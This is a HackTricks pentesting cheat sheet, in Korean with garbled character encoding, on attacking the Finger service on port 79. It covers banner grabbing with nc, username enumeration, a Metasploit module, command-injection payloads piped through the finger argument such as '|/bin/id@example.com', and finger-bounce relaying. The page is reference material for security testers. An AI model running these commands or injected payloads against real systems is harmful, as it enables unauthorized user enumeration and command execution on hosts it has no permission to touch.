# 79 - Pentesting Finger {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** ๐Ÿ’ฌ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
**์ทจ์•ฝ์  ํ‰๊ฐ€ ๋ฐ ์นจํˆฌ ํ…Œ์ŠคํŠธ๋ฅผ ์œ„ํ•œ ์ฆ‰์‹œ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ์„ค์ •**. 20๊ฐœ ์ด์ƒ์˜ ๋„๊ตฌ ๋ฐ ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•˜์—ฌ ์–ด๋””์„œ๋‚˜ ์ „์ฒด ์นจํˆฌ ํ…Œ์ŠคํŠธ๋ฅผ ์‹คํ–‰ํ•˜์„ธ์š”. ์šฐ๋ฆฌ๋Š” ์นจํˆฌ ํ…Œ์Šคํ„ฐ๋ฅผ ๋Œ€์ฒดํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค - ์šฐ๋ฆฌ๋Š” ๊ทธ๋“ค์ด ๋” ๊นŠ์ด ํŒŒ๊ณ ๋“ค๊ณ , ์‰˜์„ ํ„ฐ๋œจ๋ฆฌ๊ณ , ์žฌ๋ฏธ๋ฅผ ๊ฐ€์งˆ ์ˆ˜ ์žˆ๋„๋ก ๋งž์ถคํ˜• ๋„๊ตฌ, ํƒ์ง€ ๋ฐ ์•…์šฉ ๋ชจ๋“ˆ์„ ๊ฐœ๋ฐœํ•ฉ๋‹ˆ๋‹ค. {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} ## **๊ธฐ๋ณธ ์ •๋ณด** **Finger** ํ”„๋กœ๊ทธ๋žจ/์„œ๋น„์Šค๋Š” ์ปดํ“จํ„ฐ ์‚ฌ์šฉ์ž์— ๋Œ€ํ•œ ์„ธ๋ถ€ ์ •๋ณด๋ฅผ ๊ฒ€์ƒ‰ํ•˜๋Š” ๋ฐ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ์ œ๊ณต๋˜๋Š” ์ •๋ณด์—๋Š” **์‚ฌ์šฉ์ž์˜ ๋กœ๊ทธ์ธ ์ด๋ฆ„, ์ „์ฒด ์ด๋ฆ„**์ด ํฌํ•จ๋˜๋ฉฐ, ๊ฒฝ์šฐ์— ๋”ฐ๋ผ ์ถ”๊ฐ€ ์„ธ๋ถ€ ์ •๋ณด๊ฐ€ ํฌํ•จ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์ถ”๊ฐ€ ์„ธ๋ถ€ ์ •๋ณด์—๋Š” ์‚ฌ๋ฌด์‹ค ์œ„์น˜ ๋ฐ ์ „ํ™”๋ฒˆํ˜ธ(๊ฐ€๋Šฅํ•œ ๊ฒฝ์šฐ), ์‚ฌ์šฉ์ž๊ฐ€ ๋กœ๊ทธ์ธํ•œ ์‹œ๊ฐ„, ๋น„ํ™œ์„ฑ ๊ธฐ๊ฐ„(์œ ํœด ์‹œ๊ฐ„), ์‚ฌ์šฉ์ž๊ฐ€ ๋งˆ์ง€๋ง‰์œผ๋กœ ์ฝ์€ ๋ฉ”์ผ์˜ ์‹œ๊ฐ„, ์‚ฌ์šฉ์ž์˜ ๊ณ„ํš ๋ฐ ํ”„๋กœ์ ํŠธ ํŒŒ์ผ์˜ ๋‚ด์šฉ์ด ํฌํ•จ๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. **๊ธฐ๋ณธ ํฌํŠธ:** 79 ``` PORT STATE SERVICE 79/tcp open finger ``` ## **์—ด๊ฑฐ** ### **๋ฐฐ๋„ˆ ์ˆ˜์ง‘/๊ธฐ๋ณธ ์—ฐ๊ฒฐ** ```bash nc -vn 79 echo "root" | nc -vn 79 ``` ### **์‚ฌ์šฉ์ž ์—ด๊ฑฐ** ```bash finger @ #List users finger admin@ #Get info of user finger user@ #Get info of user ``` ๋Œ€์•ˆ์œผ๋กœ [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum)์—์„œ **finger-user-enum**์„ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ๋ช‡ ๊ฐ€์ง€ ์˜ˆ: ```bash finger-user-enum.pl -U users.txt -t 10.0.0.1 finger-user-enum.pl -u root -t 10.0.0.1 finger-user-enum.pl -U users.txt -T ips.txt ``` #### **Nmap ๊ธฐ๋ณธ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค** ### Metasploit์€ Nmap๋ณด๋‹ค ๋” ๋งŽ์€ ํŠธ๋ฆญ์„ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค ``` use auxiliary/scanner/finger/finger_users ``` ### Shodan * `port:79 USER` ## ๋ช…๋ น ์‹คํ–‰ ```bash finger "|/bin/id@example.com" finger "|/bin/ls -a /@example.com" ``` ## Finger Bounce [์‹œ์Šคํ…œ์„ finger ๋ฆด๋ ˆ์ด๋กœ ์‚ฌ์šฉํ•˜๊ธฐ](https://securiteam.com/exploits/2BUQ2RFQ0I/) ``` finger user@host@victim finger @internal@external ```
**์ทจ์•ฝ์  ํ‰๊ฐ€ ๋ฐ ์นจํˆฌ ํ…Œ์ŠคํŠธ๋ฅผ ์œ„ํ•œ ์ฆ‰์‹œ ์‚ฌ์šฉ ๊ฐ€๋Šฅํ•œ ์„ค์ •**. 20๊ฐœ ์ด์ƒ์˜ ๋„๊ตฌ์™€ ๊ธฐ๋Šฅ์„ ์‚ฌ์šฉํ•˜์—ฌ ์–ด๋””์„œ๋‚˜ ์ „์ฒด ์นจํˆฌ ํ…Œ์ŠคํŠธ๋ฅผ ์‹คํ–‰ํ•˜์„ธ์š”. ์šฐ๋ฆฌ๋Š” ์นจํˆฌ ํ…Œ์Šคํ„ฐ๋ฅผ ๋Œ€์ฒดํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค - ์šฐ๋ฆฌ๋Š” ๊ทธ๋“ค์ด ๋” ๊นŠ์ด ํŒŒ๊ณ ๋“ค๊ณ , ์‰˜์„ ํ„ฐ๋œจ๋ฆฌ๊ณ , ์žฌ๋ฏธ๋ฅผ ๋Š๋‚„ ์ˆ˜ ์žˆ๋„๋ก ๋งž์ถคํ˜• ๋„๊ตฌ, ํƒ์ง€ ๋ฐ ์•…์šฉ ๋ชจ๋“ˆ์„ ๊ฐœ๋ฐœํ•ฉ๋‹ˆ๋‹ค. {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {% hint style="success" %} AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks ์ง€์›ํ•˜๊ธฐ * [**๊ตฌ๋… ๊ณ„ํš**](https://github.com/sponsors/carlospolop) ํ™•์ธํ•˜๊ธฐ! * **๐Ÿ’ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋˜๋Š” [**ํ…”๋ ˆ๊ทธ๋žจ ๊ทธ๋ฃน**](https://t.me/peass)์— ์ฐธ์—ฌํ•˜๊ฑฐ๋‚˜ **Twitter** ๐Ÿฆ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**๋ฅผ ํŒ”๋กœ์šฐํ•˜์„ธ์š”.** * **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นƒํ—ˆ๋ธŒ ๋ฆฌํฌ์ง€ํ† ๋ฆฌ์— PR์„ ์ œ์ถœํ•˜์—ฌ ํ•ดํ‚น ํŠธ๋ฆญ์„ ๊ณต์œ ํ•˜์„ธ์š”.**
{% endhint %}